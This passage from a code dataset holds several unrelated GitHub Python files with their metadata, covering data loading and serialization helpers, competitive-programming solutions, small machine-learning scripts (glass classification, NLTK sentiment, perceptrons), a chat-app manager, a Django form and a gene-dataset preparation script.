self.out_path)\n print('{} ... unpacked'.format(ig))\n except BadZipfile:\n print('{} ... wrong file'.format(ig))\n\n def pack(self):\n pass\n\n\nclass ShelveDumper(Dumper, Fabricator):\n\n\n @classmethod\n def _is_check_for(cls, check):\n return check == 'shelve'\n\n def dump(self):\n\n with shelve.open(self.out_path) as s:\n for k, v in enumerate(self.dump_list):\n try:\n s[str(k)] = v\n print('Object {0} is dumped to \"{1}\" objects'.format(k, self.out_path))\n except TypeError:\n print('Object {0} not dumped - an error occurred'.format(k))\n\n\nclass ShelveUndumper(Undumper, Fabricator):\n\n\n @classmethod\n def _is_check_for(cls, check):\n return check == 'shelve'\n\n def undump(self):\n\n dict_of_objects = {}\n with shelve.open(self.out_path) as o:\n for k, v in o.items():\n dict_of_objects[k] = v\n return dict_of_objects.values()\n\n\nclass Processor:\n\n \"\"\"Class provides methoda for operations over data and files\n\n Available:\n - create source tree for folder\n - read and display file content\n - load file to DataFrame\n - unpack file\n - serialize data\n - unserialize data\n \"\"\"\n\n @staticmethod\n def _rjpath(path_, slack):\n\n \"\"\"Make realpath\n\n Returns:\n str: path\n \"\"\"\n\n return os.path.realpath(os.path.join(path_, slack))\n\n @staticmethod\n def _extention(in_path):\n\n \"\"\"Make file extention string\n\n Returns:\n str: extention\n \"\"\"\n\n return os.path.splitext(in_path)[1]\n\n @staticmethod\n def _check_the_input(check, method):\n\n \"\"\"Check:\n - is current class method has same name as called class method\n - is checked file extention defined for called method\n\n Returns:\n cls: cls if both conditions are True\n \"\"\"\n\n for cls_ in Fabricator.__subclasses__():\n method_list = [func for func in dir(cls_) if callable(getattr(cls_, func)) and not func.startswith(\"__\")]\n if method in method_list and cls_._is_check_for(check):\n return cls_\n try:\n raise ValueError\n except ValueError:\n print('Extention {0} is wrong! Choose another file'.format(check))\n\n @staticmethod\n def _sourcer(path_, inslack, _s_tree, _prefix=''):\n\n \"\"\"Look for source tree and make dict, where keys are file or directory name,\n values are path to file or directory\n \"\"\"\n\n names = os.listdir(path_)\n s_path = os.path.realpath(path_)\n\n for name in names:\n fullpath = os.path.join(s_path, name)\n if os.path.isfile(fullpath):\n _s_tree[_prefix + name] = fullpath\n elif os.path.isdir(fullpath):\n Processor._sourcer(os.path.join(path_, name), inslack, _s_tree, _prefix + name + '/')\n\n return _s_tree\n \n def source(self, path_=core_paths.DATA_PATH, inslack=''):\n\n \"\"\"Print source tree\n \"\"\"\n\n _s_tree = {}\n _s_tree = self._sourcer(path_, inslack, _s_tree)\n\n print('File .... fell path:')\n for key, val in _s_tree.items():\n print('{0} ..... {1}'.format(key, val))\n\n def view(self, path_=core_paths.DATA_PATH, inslack='', encoding=None):\n\n \"\"\"Read and display file\n\n Now available:\n - csv\n\n path_:\n Base placement of data files\n string: default core_paths.DATA_PATH constant\n\n inslack:\n Part of file path, looks like this/that.csv\n string: default ''\n\n encoding: \n Encoding to - use for UTF when reading/writing (ex. ‘utf-8’)\n str: default None\n\n Returns:\n str: top 5 strings of file\n \"\"\"\n\n index_col=None\n dtype=None\n parse_dates=None\n sep=None\n in_path = self._rjpath(path_, inslack)\n process = self._extention(in_path)\n process = self._check_the_input(process, inspect.stack()[0][3])\n if process:\n return process(in_path, index_col, dtype, parse_dates, sep, encoding).view()\n\n def load(self, path_=core_paths.DATA_PATH, inslack='', index_col=None, dtype=None, parse_dates=False, sep=',', encoding=None):\n\n \"\"\"Read file and return pandas dataframe\n\n Now available:\n - csv\n\n path_:\n Base placement of data files\n string: default core_paths.DATA_PATH constant\n\n inslack:\n Part of file path, looks like this/that.csv\n string: default ''\n\n index_col:\n Column to use as the row labels of the DataFrame, either given as string name or column index.\n If a sequence of int/str is given, a MultiIndex is used.\n Note: index_col=False can be used to force pandas to not use the first column as the index, e.g. when \n you have a malformed file with delimiters at the end of each line.\n int, str, sequence of int/str, or False: default None\n\n dtype: \n Data type for data or columns. E.g. {‘a’: np.float64, ‘b’: np.int32, ‘c’: ‘Int64’}\n Use str or object together with suitable na_values settings to preserve and not interpret dtype.\n If converters are specified, they will be applied INSTEAD of dtype conversion\n As example looks like 'dtype': {'assigned_day': np.float64}\n dict: default None\n\n parse_dates:\n Parse column as datetime format\n If True -> try parsing the index.\n List of int or names. e.g. If [1, 2, 3] -> try parsing columns 1, 2, 3 each as a separate date column.\n List of lists. e.g. If [[1, 3]] -> combine columns 1 and 3 and parse as a single date column.\n Dict, e.g. {‘foo’ : [1, 3]} -> parse columns 1, 3 as date and call result ‘foo’\n More information [pandas.read_csv](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html)\n If a column or index cannot be represented as an array of datetimes, \n say because of an unparseable value or a mixture of timezones, the column \n or index will be returned unaltered as an object data type.\n bool or list of int or names or list of lists or dict: default False\n\n sep:\n Delimiter to use\n string: default ','\n\n encoding: \n Encoding to - use for UTF when reading/writing (ex. ‘utf-8’)\n str: default None\n\n Returns:\n obj: Pandas dataFrame object\n \"\"\"\n\n in_path = self._rjpath(path_, inslack)\n process = self._extention(in_path)\n process = self._check_the_input(process, inspect.stack()[0][3])\n if process:\n return process(in_path, index_col, dtype, parse_dates, sep, encoding).load()\n\n def save(self):\n pass\n\n def pack(self):\n pass\n\n def unpack(self, path_=core_paths.DATA_PATH, inslack='', outslack=''):\n\n \"\"\"Unpack and extract file to target folder\n\n Now available:\n - zip\n\n path_:\n Base placement of data files\n string: default core_paths.DATA_PATH\n\n inslack:\n Part of file path, looks like this/that.zip\n string: default ''\n\n outslack:\n Part of folder path, looks like thisfolder\n string: default ''\n \"\"\"\n\n in_path = self._rjpath(path_, inslack)\n out_path = self._rjpath(path_, outslack)\n process = self._extention(in_path)\n process = self._check_the_input(process, inspect.stack()[0][3])\n if process:\n process(in_path, out_path).unpack()\n\n def dump(self, path_=core_paths.DATA_PATH, inslack='', outslack='', dump_list=None, method='shelve'):\n\n \"\"\"Save data with serialise tools\n\n Now available:\n - shelve\n\n path_:\n Base placement of data files\n string: default core_paths.DATA_PATH\n\n inslack:\n Part of dumped file path, looks like thisisnameoffile\n string: default ''\n\n outslack:\n Part of undumped structure path, looks like thisisnameoffile\n string: default ''\n\n dump_list: \n List or tuple with objects for saving\n list, tuple: default None\n\n method:\n Method of serialisation\n string: default 'shelve'\n \"\"\"\n\n in_path = self._rjpath(path_, inslack)\n out_path = self._rjpath(path_, outslack)\n process = self._check_the_input(method, inspect.stack()[0][3])\n if process:\n process(in_path, out_path, dump_list).dump()\n\n def undump(self, path_=core_paths.DATA_PATH, outslack='', method='shelve'):\n\n \"\"\"Load data with serialise tools\n\n Now available:\n - shelve\n\n path_:\n Base placement of data files\n string: default core_paths.DATA_PATH\n\n outslack:\n Part of output structure path, looks like thisisnameoffile\n string: default ''\n\n dump_list: \n List or tuple with objects for saving\n list, tuple: default None\n\n method:\n Method of serialisation\n string: default 'shelve'\n \"\"\"\n\n out_path = self._rjpath(path_, outslack)\n process = self._check_the_input(method, inspect.stack()[0][3])\n if process:\n return process(out_path).undump()\n\n\nif __name__ == \"__main__\":\n \n pro = Processor()\n pro.source(path_=core_paths.DATA_PATH_TEST)\n print('source.... ok')\n print('.' * 100)\n\n loaded = pro.view(path_=core_paths.DATA_PATH_TEST, inslack='titanic.csv')\n if loaded:\n print(loaded)\n print('view correct .... ok')\n print('.' * 100)\n\n loaded = pro.load(path_=core_paths.DATA_PATH_TEST, inslack='titanic.csv')\n if isinstance(loaded, pd.DataFrame):\n print(loaded.head(1))\n print('load correct .... ok')\n print('.' * 100)\n else:\n print('load correct.... None')\n print('.' * 100)\n\n pro.load(path_=core_paths.DATA_PATH_TEST, inslack='wrong_extention.sdv')\n print('load wrong .... ok')\n print('.' * 100)\n\n pro.unpack(path_=core_paths.DATA_PATH_TEST, inslack='titanic.zip', outslack=core_paths.DATA_OUTPUT_TEST)\n print('unpack correct .... ok')\n print('.' * 100)\n\n pro.unpack(path_=core_paths.DATA_PATH_TEST, inslack='wrong_extention.sdv', outslack=core_paths.DATA_OUTPUT_TEST)\n print('unpack wrong .... ok')\n print('.' * 100)\n\n pro.dump(path_=core_paths.DUMP_PATH_TEST, dump_list=[loaded])\n print('dump save .... ok')\n print('.' * 100)\n\n loaded, = pro.undump(path_=core_paths.DUMP_PATH_TEST)\n if isinstance(loaded, pd.DataFrame):\n print(loaded.head(1))\n print('dump load .... ok')\n print('.' * 100)\n else:\n print('dump load .... None')\n print('.' * 100)\n ","repo_name":"KonstantinKlepikov/ml_support","sub_path":"ml_support/data_obs.py","file_name":"data_obs.py","file_ext":"py","file_size_in_byte":13919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5562788825","text":"class Solution(object):\n def distributeCandies(self, candies):\n \"\"\"\n :type candies: List[int]\n :rtype: int\n \"\"\"\n temp = []\n l = len(candies)\n for i in range(l):\n if(candies[i] not in temp):\n temp.append(candies[i])\n if(len(temp) == l/2):\n return l/2\n return len(temp)","repo_name":"ArenS2/LeetC0D3","sub_path":"code/ID575.py","file_name":"ID575.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34667044692","text":"import sys, math\r\nlines = list(map(str.strip, sys.stdin.readlines()))\r\n\r\nfor i in range(1, len(lines), 2):\r\n n, k = map(int, lines[i].split(\" \"))\r\n k += 1\r\n nums = list(map(int, lines[i+1].split(\" \")))\r\n nums = list(map(math.log2, nums))\r\n for i in range(len(nums)):\r\n nums[i] += i + 1\r\n bad_pairs = {}\r\n for i in range(len(nums) - 1):\r\n if nums[i+1] <= nums[i]:\r\n bad_pairs[i] = i+1\r\n curr_bad = set()\r\n for i in range(k-1):\r\n if i in bad_pairs:\r\n curr_bad.add(i)\r\n result = 0\r\n a = 0\r\n b = k-1\r\n while b < len(nums):\r\n # print(a, b, curr_bad)\r\n if not curr_bad:\r\n result += 1\r\n if a in curr_bad:\r\n curr_bad.remove(a)\r\n if b in bad_pairs:\r\n curr_bad.add(b)\r\n a+=1\r\n b+=1\r\n print(result)\r\n # print(nums)\r\n # print(bad_pairs)\r\n # print()","repo_name":"tomasnyberg/cp_notebook","sub_path":"codeforces/1692/1692G.py","file_name":"1692G.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26807287098","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 2 21:44:06 2022\n\n@author: jose\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom chip import chip\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import accuracy_score\n\n# read\ndata = pd.read_csv('data/glass.data', header = None).values\n\nX = data[:, 1:-1]\ny = data[:, -1]\n\n# kfold\nk = 10\nsize = len(data)\nindex = list(range(size))\nnp.random.shuffle(index)\nstep = round(size / k)\nkfolds = [index[i:i+step] for i in range(0, size, step)]\n\nlog = []\nfor k, kfold in enumerate(kfolds):\n if k==10:\n continue\n fold = np.ones(size, bool)\n fold[kfold] = False\n \n X_test = X[np.invert(fold), :]\n X_train = X[fold, :]\n y_test = y[np.invert(fold)]\n y_train = y[fold]\n \n # norm\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n \n # chip\n chipclass = chip()\n chipclass.fit(X_train, y_train)\n y_hat = chipclass.predict(scaler.transform(X_test))\n log.append(accuracy_score(y_test, y_hat))\nprint(np.mean(log), np.std(log))\n","repo_name":"josegfer/rp-20221","sub_path":"ap3/glass.py","file_name":"glass.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"14340371892","text":"import logging\nimport os\nimport pickle\nimport random\nimport re\n\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\n\nclassifier = None\nword_features = None\n\n\ndef get_classifier():\n global classifier\n return classifier\n\n\ndef deserialize_model():\n global classifier\n global word_features\n\n classifier_f = open(\"./models/naivebayes.pickle\", \"rb\")\n classifier = pickle.load(classifier_f)\n classifier_f.close()\n\n features_f = open(\"./models/features.pickle\", \"rb\")\n word_features = pickle.load(features_f)\n features_f.close()\n\n\ndef train_model(train_dir, app):\n global classifier\n global word_features\n\n with app.app_context():\n try:\n perc_data = app.config['SENTIMENT_PERC_DATA']\n except Exception:\n perc_data = 1\n\n logging.debug('[SENTIMENT] Training sentiment classifier')\n\n logging.debug('[SENTIMENT] (1/6) Loading bag of words')\n all_words, documents = load_words(train_dir, perc_data)\n\n logging.debug('[SENTIMENT] (2/6) Obtaining frequency distribution of each adjective')\n all_words = nltk.FreqDist(all_words)\n word_features = list(all_words.keys())[:5000]\n\n logging.debug('[SENTIMENT] (3/6) Creating features for each review')\n feature_sets = [(find_features(rev), category) for (rev, category) in documents]\n\n logging.debug('[SENTIMENT] (4/6) Shuffling the documents')\n random.shuffle(feature_sets)\n\n logging.debug('[SENTIMENT] (5/6) Partitioning training and testing sets')\n partition_idx = int(len(feature_sets) * (4 / 5))\n training_set = feature_sets[:partition_idx]\n testing_set = feature_sets[partition_idx:]\n\n logging.debug('[SENTIMENT] (6/6) Preparing Naive Bayes classifier')\n classifier = nltk.NaiveBayesClassifier.train(training_set)\n logging.debug('[SENTIMENT] Classifier training accuracy: ' + str(\n (nltk.classify.accuracy(classifier, training_set)) * 100) + '%')\n logging.debug('[SENTIMENT] Classifier validation accuracy: ' + str(\n (nltk.classify.accuracy(classifier, testing_set)) * 100) + '%')\n\n # Serialize model\n try:\n if not os.path.exists('./models'):\n os.makedirs('./models')\n save_classifier = open(\"./models/naivebayes.pickle\", \"wb\")\n pickle.dump(classifier, save_classifier)\n save_classifier.close()\n\n save_features = open(\"./models/features.pickle\", \"wb\")\n pickle.dump(word_features, save_features)\n save_features.close()\n except OSError as e:\n logging.error(\"Unable to serialize Naive Bayes model! Classifier available but only in memory.\", e)\n # Custom method to see n most informative features as a Python list\n # pos, neg = show_most_informative_features_in_list(classifier, 100)\n logging.info(\"Sentiment classifier ready!\")\n\n\ndef load_words(train_dir, perc_data):\n all_words = []\n documents = []\n # Load adjectives, this has shown the highest accuracy\n allowed_word_types = [\"J\"]\n\n stop_words = list(set(stopwords.words('english')))\n\n files_pos = os.listdir(train_dir + '/positive')\n files_pos = [open(train_dir + '/positive/' + f, 'r').read() for f in files_pos]\n files_neg = os.listdir(train_dir + '/negative')\n files_neg = [open(train_dir + '/negative/' + f, 'r').read() for f in files_neg]\n\n logging.debug('[SENTIMENT] Loading %.2f%% of training set. (%d documents)',\n perc_data * 100, int(len(files_pos) * perc_data))\n\n files_pos = files_pos[:int(len(files_pos) * perc_data)]\n files_neg = files_neg[:int(len(files_neg) * perc_data)]\n\n logging.debug('[SENTIMENT] Loaded training set. Tokenizing positive reviews.')\n\n all_pos = []\n for p in files_pos:\n # create a list of tuples where the first element of each tuple is a review\n # the second element is the label\n documents.append((p, \"pos\"))\n\n # remove punctuations\n cleaned = re.sub(r'[^(a-zA-Z)\\s]', '', p)\n\n # tokenize\n tokenized = word_tokenize(cleaned)\n\n # remove stopwords\n stopped = [w for w in tokenized if w not in stop_words]\n\n # parts of speech tagging for each word\n pos = nltk.pos_tag(stopped)\n\n all_pos += pos\n\n # make a list of all adjectives identified by the allowed word types list above\n for w in pos:\n if w[1][0] in allowed_word_types:\n all_words.append(w[0].lower())\n\n # get word cloud\n all_pos = [x[0] for x in all_pos]\n # TODO for word cloud\n\n logging.debug('[SENTIMENT] Tokenizing negative reviews.')\n\n all_neg = []\n for p in files_neg:\n # create a list of tuples where the first element of each tuple is a review\n # the second element is the label\n documents.append((p, \"neg\"))\n\n # remove punctuations\n cleaned = re.sub(r'[^(a-zA-Z)\\s]', '', p)\n\n # tokenize\n tokenized = word_tokenize(cleaned)\n\n # remove stopwords\n stopped = [w for w in tokenized if w not in stop_words]\n\n # parts of speech tagging for each word\n neg = nltk.pos_tag(stopped)\n\n all_neg += neg\n\n # make a list of all adjectives identified by the allowed word types list above\n for w in neg:\n if w[1][0] in allowed_word_types:\n all_words.append(w[0].lower())\n\n # get word cloud\n all_neg = [x[0] for x in all_neg]\n # TODO this is for word cloud\n\n return all_words, documents\n\n\ndef find_features(document):\n global word_features\n\n words = word_tokenize(document)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n return features\n\n\ndef show_most_informative_features_in_list(classifier, n=10):\n \"\"\"\n Return a nested list of the \"most informative\" features\n used by the classifier along with it's predominant labels\n \"\"\"\n cpdist = classifier._feature_probdist # probability distribution for feature values given labels\n feature_list = []\n pos_dict = {}\n neg_dict = {}\n for (fname, fval) in classifier.most_informative_features(n):\n def labelprob(l):\n return cpdist[l, fname].prob(fval)\n\n labels = sorted([l for l in classifier._labels if fval in cpdist[l, fname].samples()],\n key=labelprob)\n ratio = labelprob(labels[1]) / labelprob(labels[0])\n feature_list.append([fname, labels[-1], ratio])\n if labels[-1] == \"pos\":\n pos_dict[fname] = ratio\n elif labels[-1] == \"neg\":\n neg_dict[fname] = ratio\n return pos_dict, neg_dict\n\n\ndef classify(text):\n global classifier\n\n if classifier is not None:\n features = find_features(text)\n return classifier.classify(features)\n","repo_name":"DavidBakerEffendi/providentia","sub_path":"providentia-flask/providentia/classifier/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":6732,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"4866788988","text":"import numpy as np\n\ninputData = np.array([[0,0],[0,1],[1,0],[1,1]])\n\ndef nandPerceptron(x1, x2):\n w1, w2, theta= -0.5, -0.5, -0.7\n netInput = x1*w1 + x2*w2\n if netInput <= theta:\n return 0\n elif netInput > theta:\n return 1\n\ndef orPerceptron(x1, x2):\n w1, w2, bias = 0.5, 0.5, -0.2\n netInput = x1*w1 + x2*w2 + bias\n if netInput <= 0:\n return 0\n else:\n return 1 \n\ndef andPerceptron(x1, x2):\n w1, w2, theta = 0.6, 0.6, 1\n netInput = x1*w1 + x2*w2\n if netInput <= theta:\n return 0\n elif netInput > theta:\n return 1\n\nprint(\"---And Perceptron---\")\nfor xs1 in inputData:\n print(str(xs1) + \" ==> \" + str(andPerceptron(xs1[0], xs1[1])))\n\nprint(\"---or Perceptron---\") \nfor xs1 in inputData:\n print(str(xs1) + \" ==> \" + str(orPerceptron(xs1[0], xs1[1])))\n\nprint(\"---nand Perceptron---\") \nfor xs1 in inputData:\n print(str(xs1) + \" ==> \" + str(nandPerceptron(xs1[0], xs1[1])))\n\n\ndef xorPerceptron(x1, x2):\n s1 = nandPerceptron(x1, x2)\n s2 = orPerceptron(x1, x2)\n y = andPerceptron(s1, s2)\n return y\n\ninputData = np.array([[0,0],[0,1],[1,0],[1,1]])\n\nprint(\"---xor Perceptron---\")\n\nfor xs4 in inputData:\n print(str(xs4) + \" ==> \" + str(xorPerceptron(xs4[0], xs4[1])))","repo_name":"saehan-choi/Fancy","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"38897605166","text":"class UserAlreadyExistError(Exception):\n\n def __init__(self, message):\n super().__init__(message)\n\n\nclass ChatApplicationManager(object):\n conversation_identifier = 1\n\n def __init__(self):\n self._online_users = []\n self._handlers = []\n self._conversation_pairs = {}\n self._conversation = {}\n\n def register_user(self, user, handler):\n for u in self._online_users:\n if user[\"user_id\"] == u[\"user_id\"]:\n print(\"User Already Exist\")\n raise UserAlreadyExistError(\"User Already Exist\")\n else:\n user_info = dict()\n user_info[\"user_id\"] = user[\"user_id\"]\n user_info[\"username\"] = user[\"user_name\"]\n self._online_users.append(user_info)\n\n handler_info = dict()\n handler_info[user[\"user_id\"]] = handler\n self._handlers.append(handler_info)\n print(\"User registered successfully\")\n\n def get_registered_users(self):\n return self._online_users, self._handlers\n\n def get_user_handler(self, user_id=None):\n for h in self._handlers:\n for k, v in h.items():\n if user_id == k:\n return v\n\n def de_register_user(self, handler):\n user_id = None\n for u in self._handlers:\n for k, v in u.items():\n if v == handler:\n user_id = k\n break\n\n for i, u in enumerate(self._online_users):\n if u[\"user_id\"] == user_id:\n self._online_users.pop(i)\n\n def get_conversation_id(self, pair):\n is_pair_exist = pair in self._conversation_pairs.values() or pair[::-1] in self._conversation_pairs.values()\n print(is_pair_exist)\n conversation_id = None\n if is_pair_exist:\n for k, v in self._conversation_pairs.items():\n if v == pair or v == pair[::-1]:\n conversation_id = k\n break\n else:\n temp = ChatApplicationManager.conversation_identifier + 1\n self._conversation_pairs[temp] = pair\n conversation_id = temp\n ChatApplicationManager.conversation_identifier = temp\n return conversation_id\n\n def get_user_name_by_id(self, user_id):\n for u in self._online_users:\n for k, v in u.items():\n if k == \"user_id\" and u[\"user_id\"] == user_id:\n return u[\"username\"]\n\n def get_conversation_by_id(self, conversation_id):\n if conversation_id in self._conversation.keys():\n return self._conversation[conversation_id]\n else:\n return []\n\n def add_message_to_conversation(self, message):\n pair = (message[\"msg_from\"], message[\"msg_to\"])\n conversation_id = self.get_conversation_id(pair)\n if conversation_id in self._conversation.keys():\n print(\"----STEP-2--------\")\n self._conversation[conversation_id].append(message)\n else:\n print(\"------STEP-1----------\")\n self._conversation[conversation_id] = [message]\n print(self._conversation)\n return conversation_id\n\n\n\n\n\n\n","repo_name":"punithkravi007/chatapp-python-tornado","sub_path":"chat_app/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"8628178322","text":"from django import forms\nfrom .models import Perro\nfrom django.contrib.auth.models import User\n\nclass PerroForm(forms.ModelForm):\n \n def __init__(self, *args, **kwargs):\n super(PerroForm, self).__init__(*args, **kwargs)\n #print (kwargs)\n\n class Meta:\n model = Perro\n\n fields = ['usuario', 'nombre', 'nacimiento', 'provincia', 'sexo', 'color', 'raza', 'size', 'foto', 'link', 'descripcion']\n #Definimos los campos extendidos que usará el formulario\n widgets = {\n 'usuario': forms.TextInput(attrs={'readonly': True}),\n 'foto': forms.ClearableFileInput(attrs={'class':'form-control-file mt-3'}),\n 'color': forms.TextInput(attrs={'placeholder':'Color'}), \n 'raza': forms.TextInput(attrs={'placeholder':'Raza'}), \n 'link': forms.TextInput(attrs={'class':'form-control', 'placeholder':'Enlace mas informacion'}), \n 'descripcion': forms.Textarea(attrs={'class':'form-control'}),\n }\n labels = {\n 'nombre': '', 'descripcion':'Descripción:', 'link':''\n }","repo_name":"JavierMartinezZgz/CHC","sub_path":"chc/perros/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7303517413","text":"import os\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom fancyimpute import IterativeImputer\r\nfrom sklearn import preprocessing\r\n\r\n#########################################################\r\n\r\n\r\njob_name = 'expression_and_ppi'\r\nresults_dir = '../results/%s' % job_name\r\nf = \"%s/df_complete_dataset.csv\" % results_dir\r\n\r\nif not os.path.exists(results_dir):\r\n os.makedirs(results_dir)\r\n\r\nremove_features = False\r\nkeep_features = False\r\nfeatures_to_keep = ['_expression', '_interactors', '_interactions'] # choose here one at a time\r\n\r\nonly_disease_causing_genes = False\r\n\r\nmerge_brain_labels = True\r\nmerge_heart_labels = True\r\nmerge_all_causal = False\r\nunclassified_is_false = True\r\n\r\nnetwork_na_is_zero = True\r\n\r\niterative_impute = True\r\nna_is_zero = not iterative_impute\r\nimpute_lcv = not iterative_impute\r\nimpute_paralogs = not iterative_impute\r\n\r\nboolean_is_binary = True\r\nadd_pca = False\r\npower_transform_expression_data = True\r\nscale_data = True\r\n\r\nprepare_data = True\r\n\r\n#########################################################\r\n\r\n\r\ndef load_dataset(file_path='', remove_non_expressed=True):\r\n df = pd.read_csv(file_path, index_col=0)\r\n\r\n num_expression_tissues = count_num_expression_tissues(df)\r\n print('num_expression_tissues:', num_expression_tissues)\r\n\r\n num_lables = sum('_causal' in s for s in list(df.columns.values))\r\n print('num_lables :', num_lables)\r\n\r\n num_features = len(list(df.columns.values)) - num_lables\r\n print('num_features: ', num_features)\r\n\r\n if remove_non_expressed:\r\n df = remove_non_expressed_genes(df, num_expression_tissues)\r\n print('num of expressed genes in dataset:', df.shape)\r\n\r\n print('num genes in dataset:', df.shape)\r\n\r\n return df, num_features\r\n\r\n\r\ndef load_adapted_dataset(results_dir):\r\n df = pd.read_csv(\"%s/df_complete_dataset_ready_adapted_no_missing_values.csv\" % results_dir, index_col=0)\r\n\r\n num_lables = sum('_causal' in s for s in list(df.columns.values))\r\n print('num_lables :', num_lables)\r\n\r\n num_features = len(list(df.columns.values)) - num_lables\r\n print('num_features: ', num_features)\r\n\r\n return df, num_features\r\n\r\n\r\ndef remove_non_expressed_genes(input_df, num_expression_tissues):\r\n new_df = input_df\r\n new_df = new_df.dropna(subset=list(input_df.columns.values)[:num_expression_tissues], how='all')\r\n\r\n return new_df\r\n\r\n\r\ndef remove_non_causal_genes(input_df, num_features):\r\n new_df = input_df.dropna(subset=[list(input_df.columns.values)[num_features:]], inplace=False, how='all')\r\n\r\n return new_df\r\n\r\n\r\ndef merge_heart_causal(input_df):\r\n new_df = input_df\r\n\r\n new_df.loc[(new_df['heart_atrial_appendage_causal'] == 1) | (new_df['heart_left_ventricle_causal'] == 1),\r\n 'heart_causal'] = 1\r\n\r\n return new_df\r\n\r\n\r\ndef merge_brain_causal(input_df):\r\n new_df = input_df\r\n\r\n new_df.loc[(new_df['brain-not_specific_causal'] == 1) | (new_df['brain-0_causal'] == 1) |\r\n (new_df['brain-1_causal'] == 1) | (new_df['brain-2_causal'] == 1),\r\n 'brain_causal'] = 1\r\n\r\n return new_df\r\n\r\n\r\ndef remove_features_containing(input_df, feature, total_num_features):\r\n\r\n feature_to_remove = feature\r\n cols = list(input_df.columns.values)\r\n cols_to_remove = [s for s in cols if ((feature_to_remove in s) and ('causal' not in s))]\r\n new_df = input_df.drop(cols_to_remove, axis=1)\r\n return_num_features = total_num_features - len(cols_to_remove)\r\n\r\n return new_df, return_num_features\r\n\r\n\r\ndef keep_features_containing(input_df, feature_strings_to_keep, total_num_features):\r\n\r\n cols = list(input_df.columns.values)\r\n feature_strings_to_keep.append('causal')\r\n print('feature_strings_to_keep:', feature_strings_to_keep)\r\n\r\n cols_to_remove = set()\r\n\r\n for col in cols:\r\n print(col)\r\n if all(feature_to_keep not in col for feature_to_keep in feature_strings_to_keep):\r\n cols_to_remove.add(col)\r\n\r\n cols_to_remove_list = list(cols_to_remove)\r\n print(cols_to_remove_list)\r\n new_df = input_df.drop(cols_to_remove_list, axis=1)\r\n\r\n return_num_features = total_num_features - len(cols_to_remove_list)\r\n\r\n return new_df, return_num_features\r\n\r\n\r\ndef power_transform_expression(input_df):\r\n cols = list(input_df.columns.values)\r\n expression_cols = [s for s in cols if 'expression' in s]\r\n print(expression_cols)\r\n\r\n transformer = preprocessing.PowerTransformer(method='yeo-johnson')\r\n input_df.loc[:, expression_cols] = transformer.fit_transform(input_df.loc[:, expression_cols])\r\n\r\n new_df = input_df\r\n\r\n return new_df\r\n\r\n\r\ndef turn_unclassified_to_false(input_df, num_features):\r\n new_df = input_df\r\n new_df[list(input_df.columns.values)[num_features:]] = \\\r\n input_df[list(input_df.columns.values)[num_features:]].fillna(False)\r\n\r\n return new_df\r\n\r\n\r\ndef lcv_na_to_median(input_df):\r\n cols = [s for s in input_df.columns.values if 'LCV' in s]\r\n new_df = input_df\r\n new_df[cols] = new_df[cols].fillna(new_df[cols].median())\r\n\r\n return new_df\r\n\r\n\r\ndef paralogs_na_to_median(input_df):\r\n cols = [s for s in input_df.columns.values if 'paralogs' in s]\r\n new_df = input_df\r\n new_df[cols] = new_df[cols].fillna(new_df[cols].median())\r\n\r\n return new_df\r\n\r\n\r\ndef na_to_zero(input_df, cols):\r\n new_df = input_df\r\n new_df[cols] = input_df[cols].fillna(0)\r\n\r\n return new_df\r\n\r\n\r\ndef boolean_to_binary(input_df):\r\n new_df = input_df\r\n\r\n new_df = new_df.applymap(lambda x: 1 if x == True else x)\r\n new_df = new_df.applymap(lambda x: 0 if x == False else x)\r\n\r\n return new_df\r\n\r\n\r\ndef count_num_expression_tissues(input_df):\r\n cols = list(input_df.columns.values)\r\n count = 0\r\n for ele in cols:\r\n if 'expression' in ele and 'preferential' not in ele:\r\n count = count + 1\r\n return count\r\n\r\n\r\ndef run_prepare_dataset(job_name='', features_to_keep=None):\r\n\r\n results_dir = '../results/%s' % job_name\r\n if not os.path.exists(results_dir):\r\n os.makedirs(results_dir)\r\n\r\n print('preparing data')\r\n\r\n if prepare_data:\r\n\r\n df_complete, num_features = load_dataset(f)\r\n\r\n if only_disease_causing_genes:\r\n df_complete = remove_non_causal_genes(df_complete, num_features)\r\n\r\n if merge_heart_labels:\r\n df_complete = merge_heart_causal(df_complete)\r\n\r\n if merge_brain_labels:\r\n df_complete = merge_brain_causal(df_complete)\r\n\r\n if remove_features:\r\n feature_to_remove = 'preferential' # choose here one at a time\r\n df_complete, num_features = remove_features_containing(df_complete, feature_to_remove, num_features)\r\n\r\n if keep_features:\r\n df_complete, num_features = keep_features_containing(df_complete, features_to_keep, num_features)\r\n\r\n print(df_complete)\r\n # num_features = len([s for s in list(df_complete.columns.values) if (feature_to_keep in s)])\r\n\r\n print('new num_features:', num_features)\r\n\r\n if unclassified_is_false:\r\n df_complete = turn_unclassified_to_false(df_complete, num_features)\r\n\r\n if boolean_is_binary:\r\n df_complete = 